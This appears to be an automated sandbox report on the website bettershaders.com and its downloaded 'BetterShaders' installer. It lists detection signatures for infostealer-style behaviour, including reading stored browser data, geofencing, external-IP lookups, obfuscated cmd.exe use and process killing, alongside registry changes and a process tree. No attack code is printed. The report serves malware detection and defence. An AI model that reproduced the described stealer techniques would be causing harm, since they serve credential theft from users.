Analysis
-
max time kernel
177s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27/05/2024, 14:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bettershaders.com
Resource
win10v2004-20240426-en
General
-
Target
https://bettershaders.com
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation 7zFM.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation BetterShaders.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation BetterShaders.exe -
Executes dropped EXE 11 IoCs
pid Process 5132 7z2406-x64.exe 5612 7z2406-x64.exe 3972 7zFM.exe 4316 BetterShaders 3.8.0.exe 1420 BetterShaders.exe 2372 BetterShaders.exe 1992 BetterShaders.exe 1524 elevate.exe 2424 BetterShaders.exe 4816 BetterShaders.exe 2288 BetterShaders.exe -
Loads dropped DLL 21 IoCs
pid Process 3512 Process not Found 3972 7zFM.exe 4316 BetterShaders 3.8.0.exe 4316 BetterShaders 3.8.0.exe 4316 BetterShaders 3.8.0.exe 1420 BetterShaders.exe 1420 BetterShaders.exe 2372 BetterShaders.exe 1992 BetterShaders.exe 2372 BetterShaders.exe 2372 BetterShaders.exe 2372 BetterShaders.exe 2372 BetterShaders.exe 2424 BetterShaders.exe 2424 BetterShaders.exe 4816 BetterShaders.exe 2288 BetterShaders.exe 4816 BetterShaders.exe 4816 BetterShaders.exe 4816 BetterShaders.exe 4816 BetterShaders.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2406-x64.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 96 ipapi.co 114 ipapi.co 95 ipapi.co -
An obfuscated cmd.exe command-line is typically used to evade detection. 4 IoCs
pid Process 5556 cmd.exe 5780 cmd.exe 5600 cmd.exe 396 cmd.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ast.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7z.dll 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\descript.ion 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ug.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7zG.exe 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\History.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 7z2406-x64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3944 tasklist.exe 3432 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 4480 taskkill.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings 7zFM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{308FC6C3-0841-48B4-8977-17468F874960} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2406-x64.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 906505.crdownload:SmartScreen msedge.exe -
Opens file in notepad (likely ransom note) 4 IoCs
pid Process 2540 NOTEPAD.EXE 3200 NOTEPAD.EXE 2068 NOTEPAD.EXE 4512 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 4636 msedge.exe 4636 msedge.exe 4816 msedge.exe 4816 msedge.exe 2820 identity_helper.exe 2820 identity_helper.exe 1572 msedge.exe 1572 msedge.exe 620 msedge.exe 620 msedge.exe 5764 msedge.exe 5764 msedge.exe 3972 7zFM.exe 3972 7zFM.exe 5656 powershell.exe 5656 powershell.exe 5656 powershell.exe 5820 powershell.exe 5820 powershell.exe 5820 powershell.exe 5320 powershell.exe 5320 powershell.exe 5320 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3972 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
pid Process 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3972 7zFM.exe Token: 35 3972 7zFM.exe Token: SeSecurityPrivilege 3972 7zFM.exe Token: SeSecurityPrivilege 3972 7zFM.exe Token: SeSecurityPrivilege 4316 BetterShaders 3.8.0.exe Token: SeDebugPrivilege 3944 tasklist.exe Token: SeDebugPrivilege 4480 taskkill.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeDebugPrivilege 5820 powershell.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeShutdownPrivilege 1420 BetterShaders.exe Token: SeCreatePagefilePrivilege 1420 BetterShaders.exe Token: SeDebugPrivilege 3432 tasklist.exe -
Suspicious use of FindShellTrayWindow 61 IoCs
pid Process 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 3972 7zFM.exe 3972 7zFM.exe 3972 7zFM.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe 4816 msedge.exe -
Suspicious use of SetWindowsHookEx 21 IoCs
pid Process 5132 7z2406-x64.exe 5612 7z2406-x64.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4816 wrote to memory of 1908 4816 msedge.exe 83 PID 4816 wrote to memory of 1908 4816 msedge.exe 83 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 396 4816 msedge.exe 84 PID 4816 wrote to memory of 4636 4816 msedge.exe 85 PID 4816 wrote to memory of 4636 4816 msedge.exe 85 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86 PID 4816 wrote to memory of 3656 4816 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bettershaders.com1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbac2346f8,0x7ffbac234708,0x7ffbac2347182⤵PID:1908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:22⤵PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:82⤵PID:3656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:12⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:12⤵PID:2200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:12⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:82⤵PID:4352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:12⤵PID:4264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,16138483763007697507,1246612359125491840,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4772 /prefetch:82⤵PID:1604
-
-
